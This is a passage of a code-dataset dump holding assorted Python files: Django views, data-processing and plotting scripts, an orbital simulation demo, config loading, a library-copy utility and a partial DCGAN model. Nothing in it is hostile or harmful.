pass\n\n","sub_path":"model/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":6850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"230042357","text":"from django.shortcuts import render\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom rest_framework import status\nimport requests\nfrom .models import Order\nimport datetime\n\n# Create your views here.\n\n\ndef query_book(book_id):\n try:\n response = requests.get(\n f'http://catalog-instance1:9000/catalog/info/{book_id}')\n return response\n except:\n raise requests.ConnectionError\n\n\ndef book_exists(status_code):\n if status_code == 200:\n return True\n return False\n\n\ndef book_available_in_stock(number_of_items):\n print(number_of_items)\n if number_of_items > 0:\n return True\n return False\n\n\ndef decrement_number_of_books(book_id):\n requests.put(f'http://catalog-instance1:9000/catalog/decrement/{book_id}')\n\n\ndef store_order(book_id):\n order = Order(book_id=book_id)\n order.save()\n return\n\n\n@api_view(['POST'])\ndef purchase_book(request, book_id):\n '''\n purchase_book Function:\n purchase a book with the specified id\n\n\n Parameter:\n book_id : book id\n\n Return:\n returns a successfull message alongside with the purchased book info \n '''\n\n try:\n response = query_book(book_id)\n\n if book_exists(response.status_code):\n book = response.json()\n if book_available_in_stock(book['number_of_items']):\n decrement_number_of_books(book_id)\n store_order(book_id)\n return Response({\n \"Message\": \"Book purchased successfully\",\n \"book\": book\n })\n\n return Response({\n \"Message\": \"This Book is not available in the stock, sorry!\"\n }, status=status.HTTP_404_NOT_FOUND)\n\n return Response({\n \"Message\": \"This Book is not found\"\n }, status=status.HTTP_404_NOT_FOUND)\n\n except requests.ConnectionError:\n return Response({\n \"Message\": \"This service is not available right now\"\n }, status=status.HTTP_503_SERVICE_UNAVAILABLE)\n","sub_path":"Order-Server/order_server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"480532275","text":"from django.shortcuts import render\n\n\ndef count_smt_in_text(request):\n\n what_count = {\n 'letter': letter_count,\n 'word': word_count,\n }\n\n text = ''\n response = ''\n what_count_choice = ''\n\n if request.POST.get('count'):\n text = request.POST.get('text')\n what_count_choice = request.POST.get('what_count')\n\n count_smt_dict = what_count[what_count_choice](text)\n\n response = f\"Количество {count_smt_dict['value']} в тексте - {count_smt_dict['count']}\"\n response += f\". Из них количество уникальных - {count_smt_dict['uniqwcount']}\" if count_smt_dict['uniqwcount'] else ''\n \n context = {\n 'text': text,\n 'what_count': what_count_choice,\n 'response': response,\n }\n\n return render(request, 'text_manipulation/count_smt.html', context)\n\n\n\n# helper methods\ndef word_count (text:str):\n \n wcount_dict = {\n 'value': 'слов',\n 'count': 0,\n 'uniqwcount': 0,\n }\n if text:\n text = text.replace(\"\\n\", \" \")\n text = text.replace(\",\", \"\").replace(\".\", \"\").replace(\"?\", \"\").replace(\"!\", \"\")\n text = text.lower()\n\n text_arr = text.split(' ')\n wcount_dict['count'] = len(text_arr)\n print(list({i for i in text.split(' ')}))\n wcount_dict['uniqwcount'] = len(list({i for i in text_arr}))\n\n return wcount_dict\n\ndef letter_count (text:str):\n lcount_dict = {\n 'value': 'букв',\n 'count': len(text),\n 'uniqwcount': None,\n }\n return lcount_dict","sub_path":"main-app/text_manipulation/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"82394558","text":"import pandas as pd\r\nimport os\r\n\r\nHeader = [\"GSTIN of supplier\",\"Trade/Legal name of the Supplier\",\"Invoice number\",\"Invoice type\",\"Invoice Date\",\"Invoice Value (₹)\",\"Place of supply\",\"Supply Attract Reverse Charge\",\"Rate (%)\",\"Taxable Value (₹)\",\"Integrated Tax (₹)\",\"Central Tax (₹)\",\"State/UT tax (₹)\",\"Cess (₹)\",\"Counter Party Return status\"]\r\ndataframes = []\r\nfor files in os.listdir('Excel Files/'):\r\n\r\n dfs = pd.read_excel('Excel Files/'+files,sheet_name = \"B2B\")\r\n temp = pd.DataFrame(dfs[5:])\r\n dataframes.append(temp)\r\ndata = pd.concat(dataframes)\r\ndata.columns = Header\r\ndata.to_csv('Final_Data.csv',index=False)","sub_path":"GenerateCombinedFiles.py","file_name":"GenerateCombinedFiles.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"164597412","text":"\"\"\"\nUnit tests for the complex arithmetic equations\n\"\"\"\n\nimport unittest\n\nfrom packy.arithmetic.complex import LinearEquation, QuadraticEquation\n\n\nclass ComplexTest(unittest.TestCase):\n\n def test_linear_equation(self):\n eq = LinearEquation(2, 1)\n self.assertEqual(eq.get_y(2), 5, \"linear equation get_y() not working\")\n self.assertEqual(eq.next_y(), 3, \"linear equation next_y() not working\")\n self.assertEqual(eq.next_y(), 5, \"linear equation next_y() not working\")\n\n def test_quadratic_equation(self):\n eq = QuadraticEquation(1, 2, 1)\n self.assertEqual(eq.get_y(2), 9, \"quadratic equation get_y() not working\")\n self.assertEqual(eq.next_y(), 4, \"quadratic equation next_y() not working\")\n self.assertEqual(eq.next_y(), 9, \"quadratic equation next_y() not working\")\n\n\nif __name__ == '__main__':\n unittest.main()\n\n","sub_path":"packy/arithmetic/test/test_complex.py","file_name":"test_complex.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"311497604","text":"\n\"\"\"Test orbital dynamics with a solar system much like our own...\"\"\"\n\nfrom astropy import units as u\n\nimport exoechopy as eep\nfrom exoechopy.simulate.orbital_physics import true_anomaly_from_mean\n\n\n# ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n\n# TODO make sure orbits are animated correctly, Mercury is moving too fast?\n\n\ndef run():\n\n spectral_band = eep.simulate.spectral.JohnsonPhotometricBand('U')\n emission_type = eep.simulate.spectral.SpectralEmitter(spectral_band, magnitude=16)\n\n MyStar = eep.simulate.Star(mass=1*u.M_sun, radius=1.*u.R_sun, spectral_type=emission_type,\n name=\"Solly\", point_color='darkorange')\n\n # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n\n planet_albedo = eep.simulate.spectral.Albedo(spectral_band, 1.)\n\n # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #\n a_M1 = 0.38709893*u.au\n e_M1 = 0.20563069\n i_M1 = 3.38*u.deg # relative to sun equator\n L_M1 = 48.33167*u.deg\n w_M1 = 77.45645*u.deg - L_M1\n M_M1 = true_anomaly_from_mean(252.25084*u.deg - w_M1 - L_M1, e_M1)\n MercurialPlanet = eep.simulate.KeplerianExoplanet(semimajor_axis=a_M1,\n eccentricity=e_M1,\n inclination=i_M1,\n longitude=L_M1,\n periapsis_arg=w_M1,\n initial_anomaly=M_M1,\n albedo=planet_albedo,\n point_color='k', path_color='dimgray',\n name='Mercurial')\n MyStar.add_orbiting_object(MercurialPlanet)\n\n # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #\n a_V = 0.72333199*u.au\n e_V = 0.006772\n i_V = 3.86*u.deg # relative to sun equator\n L_V = 76.68069*u.deg\n w_V = 131.53298*u.deg - L_V\n M_V = true_anomaly_from_mean(181.97973*u.deg - w_V - L_V, e_V)\n VenusianPlanet = eep.simulate.KeplerianExoplanet(semimajor_axis=a_V,\n eccentricity=e_V,\n inclination=i_V,\n longitude=L_V,\n periapsis_arg=w_V,\n initial_anomaly=M_V,\n albedo=planet_albedo,\n point_color='orange', path_color='darkgoldenrod',\n name='Venusian')\n MyStar.add_orbiting_object(VenusianPlanet)\n\n # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #\n a_E = 1.00000011*u.au\n e_E = 0.01671022\n i_E = 7.155*u.deg # relative to sun equator\n L_E = -11.26064*u.deg\n w_E = 102.94719*u.deg - L_E\n M_E = true_anomaly_from_mean(100.46435*u.deg - w_E - L_E, e_E)\n EarthyPlanet = eep.simulate.KeplerianExoplanet(semimajor_axis=a_E,\n eccentricity=e_E,\n inclination=i_E,\n longitude=L_E,\n periapsis_arg=w_E,\n initial_anomaly=M_E,\n albedo=planet_albedo,\n point_color='b', path_color='lightskyblue',\n name='Earthy')\n MyStar.add_orbiting_object(EarthyPlanet)\n\n # ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ #\n a_M2 = 1.52366231*u.au\n e_M2 = 0.09341233\n i_M2 = 5.65*u.deg # relative to sun equator\n L_M2 = 49.57854*u.deg\n w_M2 = 336.04084*u.deg - L_M2\n M_M2 = true_anomaly_from_mean(355.45332*u.deg - w_M2 - L_M2, e_M2)\n MarsyPlanet = eep.simulate.KeplerianExoplanet(semimajor_axis=a_M2,\n eccentricity=e_M2,\n inclination=i_M2,\n longitude=L_M2,\n periapsis_arg=w_M2,\n initial_anomaly=M_M2,\n albedo=planet_albedo,\n point_color='darkred', path_color='salmon',\n name='Martian')\n MyStar.add_orbiting_object(MarsyPlanet)\n\n\n # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\n\n EarthyPlanet.about_orbit()\n\n # eep.visualize.keplerian_orbit_plot(MercurialPlanet)\n\n eep.visualize.render_3d_planetary_system(MyStar)\n\n eep.visualize.animate_3d_planetary_system(MyStar)\n\n\n# ******************************************************************************************************************** #\n# ************************************************ TEST & DEMO CODE ************************************************ #\n\n\nif __name__ == \"__main__\":\n run()\n\n\n","sub_path":"examples/submodules/generate_terran_star_system.py","file_name":"generate_terran_star_system.py","file_ext":"py","file_size_in_byte":5544,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"145356966","text":"import os\nfrom confypy import Config\nfrom confypy import Location\n\nyamlConf = '.octobot/config.yaml'\nud = os.path.expanduser('~')\ncwd = os.getcwd()\nuser_config = os.path.join(ud, yamlConf)\nlocal_config = os.path.join(cwd, yamlConf)\n\nenv_keys = [\n 'OCTOBOT_INCOMING_WEBHOOK_URL',\n 'OCTOBOT_USERNAME',\n 'OCTOBOT_CHANNEL',\n 'OCTOBOT_ICON_EMOJI',\n 'OCTOBOT_ALIASES',\n 'OCTOBOT_DEBUG',\n]\n\ndefaults = {\n 'OCTOBOT_INCOMING_WEBHOOK_URL': 'http://example.com',\n 'OCTOBOT_USERNAME': 'octobot',\n 'OCTOBOT_CHANNEL': '#general',\n 'OCTOBOT_ICON_EMOJI': ':octopus:',\n 'OCTOBOT_ALIASES': []\n}\n\n\ndef load_config(overrides):\n config = Config(chain=True, defaults=defaults)\n\n config.locations = [\n Location.from_env_keys(env_keys),\n Location.from_path(user_config),\n Location.from_path(local_config),\n Location.from_dict(overrides),\n ]\n\n return config\n","sub_path":"octobot/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"277890510","text":"import os\nimport sys\nimport subprocess\nimport json\nimport shutil\n\njson_dir = sys.argv[1]\nout_dir = sys.argv[2]\nmoco_path = sys.argv[3]\nmax_len = sys.argv[4]\n\ninst_dict_file = os.path.join(moco_path, 'inst_dict.txt')\nstate_dict_file = os.path.join(moco_path, 'state_dict.txt')\n\nstate_dict = {}\nfor line in open(state_dict_file):\n s = line.strip().split()\n if len(s) == 2:\n token, freq = s\n state_dict[token] = int(freq)\n\ndef process_inst(in_file, out_file, dict_file):\n cmd = ['../bin/irlexer', 'process-inst', in_file, dict_file, dict_file, '../bin/fast', os.path.join(moco_path, 'bpe_codes'), max_len]\n subprocess.run(cmd, stdout=open(out_file, 'w'), stderr=subprocess.STDOUT)\n\ndef to_rawtext(in_file, out_file, vocab=None):\n with open(in_file) as fi, open(out_file, 'w') as fo:\n for line in fi:\n data = json.loads(line)\n tokens = []\n for d in data:\n if tokens:\n tokens.append('')\n if vocab is None:\n tokens += d\n else:\n for t in d:\n if not t:\n continue\n elif t in vocab:\n tokens.append(t)\n elif t[0] in ['a', 'v', 'm']:\n tokens.append('')\n else:\n tokens.append('')\n fo.write(' '.join(tokens) + '\\n')\n\nprocess_inst(os.path.join(json_dir, 'insts.json'), os.path.join(out_dir, 'insts.json'), inst_dict_file)\nto_rawtext(os.path.join(out_dir, 'insts.json'), os.path.join(out_dir, 'insts.txt'))\nto_rawtext(os.path.join(json_dir, 'states.json'), os.path.join(out_dir, 'states.txt'), state_dict)\nshutil.copyfile(os.path.join(json_dir, 'pos.json'), os.path.join(out_dir, 'pos.json'))\n","sub_path":"process-poj-classification-data/5_json_to_rawtext.py","file_name":"5_json_to_rawtext.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"3706579","text":"# -*- coding: utf-8 -*-\n\nimport os, sys\nimport shutil\nimport string\nimport json\nimport glob\n\n\npathRun = os.getcwd() + '/'\npathFile = os.path.abspath(__file__)\npathFileDir = pathFile[0: pathFile.rfind('/')] + '/'\npathUserHome = os.path.expanduser('~') + '/'\nplatform = sys.platform\npathCopy = '/reckless/RCF/lib/'\nboostMT = ''\nfileType = 'so'\nif 'darwin' == platform:\n boostMT = '-mt'\n fileType = 'dylib'\n\n\npublicDir = ['/usr/local/lib/', '/usr/lib/', '/usr/lib/x86_64-linux-gnu/', '/lib/x86_64-linux-gnu/']\nlibsDir = {\n 'libcurl.%s' % fileType: ['/usr/local/opt/curl/lib/', '/usr/local/opt/curl-openssl/lib/'],\n 'libssl.%s' % fileType: ['/reckless/opt/openssl_1.1.1/lib/'],\n 'libcrypto.%s' % fileType: ['/reckless/opt/openssl_1.1.1/lib/'],\n 'libhiredis.%s' % fileType: ['/usr/local/opt/hiredis/lib/'],\n 'libjsoncpp.%s' % fileType: ['/usr/local/opt/jsoncpp/lib/'],\n 'libglog.%s' % fileType: ['/usr/local/opt/glog/lib/'],\n 'libgflags.%s' % fileType: ['/usr/local/opt/gflags/lib/'],\n #'libpthread.%s' % fileType: ['/usr/lib/'],\n #'libdl.%s' % fileType: ['/usr/lib/'],\n #'libm.%s' % fileType: ['/usr/lib/'],\n #'libstdc++.%s' % fileType: ['/usr/lib/'],\n #'libgcc_s.%s' % fileType: ['/usr/lib/'],\n #'libc.%s' % fileType: ['/usr/lib/'],\n\n 'libboost_thread%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/'],\n 'libboost_system%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/'],\n 'libboost_atomic%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/'],\n 'libboost_chrono%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/'],\n 'libboost_date_time%s.%s' % (boostMT, fileType): ['/usr/local/opt/boost/lib/']\n}\n\n\nif not os.path.exists (pathCopy):\n os.mkdir(pathCopy)\nfor i in libsDir:\n print ('寻找 %s' % i)\n\n l = list()\n for j in libsDir[i]:\n l.append(j)\n for j in publicDir:\n l.append(j)\n\n ok = False\n for j in l:\n pathObj = j + i\n objDir = pathObj[:pathObj.rfind('/') + 1]\n objName = pathObj[pathObj.rfind('/') + 1: ]\n for f in glob.glob(objDir + objName + '*'):\n ok = True\n shutil.copy(f, pathCopy)\n if not ok:\n print ('寻找 %s 失败,所有路径全都找不到文件,请人为干预' % i)\n if 'linux' == platform:\n sys.exit(-1)\n \n\n\n\n\n","sub_path":"copyDL.py","file_name":"copyDL.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"313393777","text":"##Programmer: Joselyne Guillen\r\n##File Name: sentenceCapitalizer.py \r\n##Date: 3/14/21\r\n##Version: 1.6\r\n##Explanation of Program: \r\n##This program asks the user to input statements\r\n##that don't have the first characters of each\r\n##sentence capitalized and properly capitalizes\r\n##the user input for them.\r\n\r\ndef main(): #main function\r\n userStringInput = input('Enter a statement with the first character of each sentence not capitalized\\n') #asks user to input an uncapitalized statement\r\n print('Here is the statement with appropriate capitalization:') #label\r\n newString = capitalize(userStringInput) #function-returning call that sends user input as argument to properly capitalize statement\r\n print(newString) #prints capitalized statement\r\ndef capitalize(userString): #function that capitalizes the first character of each sentence\r\n userStringList = userString.split(' ') #splits input based on sentences and turns each sentence into an element in a list\r\n newChar = '' #initialize string\r\n i = 0 #initialize counter\r\n for sentence in userStringList: #loop to read each sentence element in the list\r\n sentence = sentence.strip() #strips the sentence element of blank spaces\r\n for char in sentence: #loop to read each character in the sentence element\r\n if char != sentence[0]: #if the read character is not the beginning character\r\n newChar = newChar + char #add character as is to new string\r\n else: #if the read character is the beginning character\r\n if i == 0: #if counter is 0, which signifies the beginning of the sentence element\r\n newChar = newChar + char.upper() #convert the character to uppercase character and add it to new string\r\n i = i + 1 #increase counter by 1\r\n \r\n else:\r\n newChar = newChar + char.lower() #if counter is not 0, meaning it is not the beginning of the sentence element, convert the character to lowercase character and add it to new string\r\n i = 0 #resets counter for next sentence element in list\r\n \r\n if newChar.endswith('.'): #if string ends with period, leave as is\r\n newChar = newChar + ''\r\n elif newChar.endswith('?'): #if string ends with question mark, leave as is\r\n newChar = newChar + ''\r\n elif newChar.endswith('!'): #if string ends with exclamation mark, leave as is\r\n newChar = newChar + ''\r\n else:\r\n newChar = newChar + '.' #if string doesn't end with period, add one at the end\r\n \r\n return newChar #returns the modified statement\r\n \r\nmain() #function call for main\r\n","sub_path":"sentenceCapitalizer.py","file_name":"sentenceCapitalizer.py","file_ext":"py","file_size_in_byte":2712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"55880981","text":"# 集合:无序,直接,有可变和不可变两种集合,不可变类型的数据才能成为集合元素\n# 集合也用{},像是一个无值的字典\naset = set('hello') # 可变 {'h', 'e', 'l', 'o'}\nbset = frozenset('hello') # 不可变\ncset = set(['hello', 'world']) # {'hello', 'world'}\n\nprint(len(aset))\nfor ch in aset:\n print(ch)\n# ----------------\naset = set('abc') # {'b', 'a', 'c'}\nbset = set('cde')\nprint(aset & bset) # 交集\nprint(aset | bset) # 并集\nprint(aset - bset) # 差补,元素只在aset中,不在bset中\naset.add('new') # {'b', 'a', 'c', 'new'}\naset.update('new') # {'a', 'b', 'e', 'c', 'w', 'n', 'new'}\naset.update(('hello', 'world'))\naset.remove('hello') # 移除hello\n#----------------\naset = set('abcde')\nbset = set('cde')\nbset.issubset(aset) # bset是aset的子集\naset.issuperset(bset) # aset是bset的超集\naset.union(bset) # 并集\naset.intersection(bset) # 交集\naset.difference(bset) # 差补\n","sub_path":"pythonScripts/PyScripts/PyScripts5/myset.py","file_name":"myset.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"340648091","text":"# \n# github Repo: https://github.com/clejae\n\n# ------------------------------------------ LOAD PACKAGES ---------------------------------------------------#\nimport os\nimport time\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib.patches import Patch\nimport numpy as np\n\n# ------------------------------------------ DEFINE FUNCTIONS ------------------------------------------------#\ndef prepareDataFrame(df_pth, per_lst):\n df_lst = []\n for per in per_lst:\n df = pd.read_excel(df_pth, per)\n t_area = df['SUM'].sum()\n for i in range(1, 10):\n df[str(i)] = round(df[str(i)] / t_area * 100, 2)\n df_lst.append(df)\n\n mt_lst = []\n for mt in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I']:\n for df in df_lst:\n df_mt = df[df['MainType'] == mt]\n mt_lst.append(df_mt)\n cols = ['MainType', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'SUM']\n if mt != 'I':\n df_dummy = pd.DataFrame(np.zeros((1, 11)), columns=cols)\n mt_lst.append(df_dummy)\n df_plt = pd.concat(mt_lst)\n\n return df_plt\n\ndef cm2inch(*tupl):\n inch = 2.54\n if isinstance(tupl[0], tuple):\n return tuple(i/inch for i in tupl[0])\n else:\n return tuple(i/inch for i in tupl)\n# ------------------------------------------ START TIME ------------------------------------------------------#\nstime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"start: \" + stime)\n# ------------------------------------------ USER VARIABLES ------------------------------------------------#\nwd = r'\\\\141.20.140.91\\SAN_Projects\\FORLand\\Clemens\\\\'\n# ------------------------------------------ LOAD DATA & PROCESSING ------------------------------------------#\nos.chdir(wd)\n\n##########################################################\nout_pth = r\"figures\\in_paper\\FigS3_SuSc.tiff\"\n# ------------------------------------------ LOAD DATA & PROCESSING ------------------------------------------#\n## define lists to access data and datasheets\n## and to provide federal state names for annotation\nbl = 'LS'\nper_lst = ['12-18 Sub','12-18 Total']\n\n## create plot with subplots\nplt.rcParams['legend.handlelength'] = 1\nplt.rcParams['legend.handleheight'] = 1.125\nplt.rcParams['legend.title_fontsize'] = '10'\nplt.rcParams[\"font.family\"] = \"Calibri\"\n\nncol = 1\nnrow = 1\nfig, axs = plt.subplots(nrows=nrow, ncols=ncol, sharey=True, sharex=True, figsize=cm2inch(17.6, 8))\n\n## prepare data frame\ndf_pth = r\"data\\tables\\crop_sequence_types\\{0}\\{0}_2012-2018_CSTArea-StudyAreaSusanne.xlsx\".format(bl)\ndf_plt = prepareDataFrame(df_pth, per_lst)\n\n## plot stacked bars\ncolors = ['#ffd37f','#e69600','#a87000','#d1ff73','#7aab00','#4c7300','#bee8ff','#73b2ff','#004da8']\ndf_plt[[str(i)for i in range(1,10)]].plot(kind=\"bar\", stacked=True, color=colors, ax = axs, legend=False)\n\n## set x and y ticks and label them\naxs.set_yticks(np.arange(0, 31, step=5))\naxs.set_yticklabels(range(0, 31, 5), fontdict={'size': 10})\nx_ticks = list(np.arange(0,27,1))\ndel x_ticks[2::3]\naxs.set_xticks(x_ticks)\naxs.set_xticklabels(10 * ['Subset','Total'],fontdict={'size': 10})\n\n## label y axis\naxs.set_xlabel('Structural diversity', fontdict={'size': 10})\naxs.set_ylabel('Share of cropland [%]',fontdict={'size': 10})\n\n## add y-grid, adjust tick colors, remove frame\naxs.grid(b=True, which='major', axis='y', color='grey', linewidth=0.5)\naxs.tick_params(axis='x', colors='white', labelcolor ='black')\naxs.tick_params(axis='y', colors='grey', labelcolor ='black')\naxs.spines['bottom'].set_color('grey')\naxs.spines['right'].set_visible(False)\naxs.spines['left'].set_visible(False)\naxs.spines['top'].set_visible(False)\naxs.set_axisbelow(True)\n\n# ## Draw line between sub and total columns\n# x1 = 0\n# x2 = 0\n# for count in range(9):\n# x1 = count * 3 + 1.5\n# x2 = count * 3 + 2.5\n# plt.axvline(x1, 0, 30, ls ='--', c = 'black', lw = '0.5')\n# plt.axvline(x2, 0, 30, ls ='--', c = 'black', lw = '0.5')\n\n\n## annotate main types in top subplot\nbbox = dict(facecolor='white', edgecolor='black', boxstyle='round')\nx=0\nfor mt in ['A','B','C','D','E','F','G','H','I']:\n axs.annotate(mt, xy=(x, 26.5), fontsize=10)\n x += 3\n\n# create custom legend\nlegend_elements = [Patch(facecolor='#ffd37f', edgecolor='#ffd37f',\n label='1'),\n Patch(facecolor='#e69600', edgecolor='#e69600',\n label='2'),\n Patch(facecolor='#a87000', edgecolor='#a87000',\n label='3'),\n Patch(facecolor='#d1ff73', edgecolor='#d1ff73',\n label='4'),\n Patch(facecolor='#7aab00', edgecolor='#7aab00',\n label='5'),\n Patch(facecolor='#4c7300', edgecolor='#4c7300',\n label='6'),\n Patch(facecolor='#bee8ff', edgecolor='#bee8ff',\n label='7'),\n Patch(facecolor='#73b2ff', edgecolor='#73b2ff',\n label='8'),\n Patch(facecolor='#004da8', edgecolor='#004da8',\n label='9')]\n\nfig.legend(handles=legend_elements, loc='lower center', ncol=9, title ='Functional diversity', fontsize=9, frameon=False)# bbox_to_anchor= (0.00, 0.00, 0.1, 0.1))\nfig.tight_layout()\nfig.subplots_adjust(top=0.95,bottom=0.35)\nplt.savefig(out_pth, dpi=300)\n\n# ------------------------------------------ END TIME --------------------------------------------------------#\netime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"start: \" + stime)\nprint(\"end: \" + etime)\n# ------------------------------------------ UNUSED BUT USEFUL CODE SNIPPETS ---------------------------------#\n\n\n\n\n\n# ------------------------------------------ END TIME --------------------------------------------------------#\netime = time.strftime(\"%a, %d %b %Y %H:%M:%S\", time.localtime())\nprint(\"start: \" + stime)\nprint(\"end: \" + etime)\n# ------------------------------------------ UNUSED BUT USEFUL CODE SNIPPETS ---------------------------------#\n\n\n","sub_path":"figures_in_paper/figS03_sub_vs_total_csts_shares_in_ls.py","file_name":"figS03_sub_vs_total_csts_shares_in_ls.py","file_ext":"py","file_size_in_byte":6085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"321601180","text":"import os\nimport time\n\nimport numpy as np\nimport tensorflow as tf\n\nfrom imagenet.build_model import build_model\nfrom imagenet.generator import Generator\nfrom imagenet.ops import BatchNorm, batch_norm_second_half, batch_norm_first_half, batch_norm_cross, linear, lrelu, \\\n conv2d\nfrom imagenet.utils import save_images\nfrom .ops import variables_on_gpu0, avg_grads\n\nfilename = \"/media/NAS_SHARED/imagenet/imagenet_train_128.tfrecords\"\n\n\nclass DCGAN(object):\n def __init__(self, sess, image_size=108, is_crop=True,\n batch_size=64, image_shape=[64, 64, 3],\n y_dim=None, z_dim=100, gf_dim=64, df_dim=64,\n gfc_dim=1024, dfc_dim=1024, c_dim=3, dataset_name='default',\n d_label_smooth=.25,\n generator_target_prob=1.,\n checkpoint_dir=None, sample_dir='samples',\n config=None,\n devices=None,\n disable_vbn=False,\n sample_size=64,\n out_init_b=0.,\n out_stddev=.15):\n \"\"\"\n\n Args:\n sess: TensorFlow session\n batch_size: The size of batch. Should be specified before training.\n y_dim: (optional) Dimension of dim for y. [None]\n z_dim: (optional) Dimension of dim for Z. [100]\n gf_dim: (optional) Dimension of gen filters in first conv layer. [64]\n df_dim: (optional) Dimension of discrim filters in first conv layer. [64]\n gfc_dim: (optional) Dimension of gen units for for fully connected layer. [1024]\n dfc_dim: (optional) Dimension of discrim units for fully connected layer. [1024]\n c_dim: (optional) Dimension of image color. [3]\n \"\"\"\n self.writer = tf.summary.FileWriter(\"./logs\", self.sess.graph_def)\n self.saver = tf.train.Saver()\n self.disable_vbn = disable_vbn\n self.devices = devices\n self.d_label_smooth = d_label_smooth\n self.out_init_b = out_init_b\n self.out_stddev = out_stddev\n self.config = config\n self.generator_target_prob = generator_target_prob\n self.generator = Generator(self)\n self.sess = sess\n self.is_crop = is_crop\n self.batch_size = batch_size\n self.image_size = image_size\n self.sample_size = sample_size\n self.image_shape = image_shape\n self.sample_dir = sample_dir\n\n self.y_dim = y_dim\n self.z_dim = z_dim\n\n self.gf_dim = gf_dim\n self.df_dim = df_dim\n\n self.gfc_dim = gfc_dim\n self.dfc_dim = dfc_dim\n\n self.c_dim = 3\n\n # batch normalization : deals with poor initialization helps gradient flow\n self.d_bn1 = BatchNorm(batch_size, name='d_bn1')\n self.d_bn2 = BatchNorm(batch_size, name='d_bn2')\n\n if not self.y_dim:\n self.d_bn3 = BatchNorm(batch_size, name='d_bn3')\n\n self.g_bn0 = BatchNorm(batch_size, name='g_bn0')\n self.g_bn1 = BatchNorm(batch_size, name='g_bn1')\n self.g_bn2 = BatchNorm(batch_size, name='g_bn2')\n\n if not self.y_dim:\n self.g_bn3 = BatchNorm(batch_size, name='g_bn3')\n # Not used by all generators\n self.g_bn4 = BatchNorm(batch_size, name='g_bn4')\n self.g_bn5 = BatchNorm(batch_size, name='g_bn5')\n\n self.dataset_name = dataset_name\n self.checkpoint_dir = checkpoint_dir\n self.build_model()\n\n def build_model(self):\n all_d_grads = []\n all_g_grads = []\n config = self.config\n d_opt = tf.train.AdamOptimizer(config.discriminator_learning_rate, beta1=config.beta1)\n g_opt = tf.train.AdamOptimizer(config.generator_learning_rate, beta1=config.beta1)\n\n for idx, device in enumerate(self.devices):\n with tf.device(\"/%s\" % device):\n with tf.name_scope(\"device_%s\" % idx):\n with variables_on_gpu0():\n self.build_model_single_gpu(self, idx)\n d_grads = d_opt.compute_gradients(self.d_losses[-1], var_list=self.d_vars)\n g_grads = g_opt.compute_gradients(self.g_losses[-1], var_list=self.g_vars)\n all_d_grads.append(d_grads)\n all_g_grads.append(g_grads)\n tf.get_variable_scope().reuse_variables()\n avg_d_grads = avg_grads(all_d_grads)\n avg_g_grads = avg_grads(all_g_grads)\n self.d_optim = d_opt.apply_gradients(avg_d_grads)\n self.g_optim = g_opt.apply_gradients(avg_g_grads)\n\n def build_model_single_gpu(self, gpu_idx):\n assert not self.y_dim\n\n if gpu_idx == 0:\n filename_queue = tf.train.string_input_producer([filename]) # num_epochs=self.config.epoch)\n self.get_image, self.get_label = read_and_decode_with_labels(filename_queue)\n\n with tf.variable_scope(\"misc\"):\n chance = 1. # TODO: declare this down below and make it 1. - 1. / num_classes\n avg_error_rate = tf.get_variable('avg_error_rate', [],\n initializer=tf.constant_initializer(0.),\n trainable=False)\n num_error_rate = tf.get_variable('num_error_rate', [],\n initializer=tf.constant_initializer(0.),\n trainable=False)\n\n images, sparse_labels = tf.train.shuffle_batch([self.get_image, self.get_label],\n batch_size=self.batch_size,\n num_threads=2,\n capacity=1000 + 3 * self.batch_size,\n min_after_dequeue=1000,\n 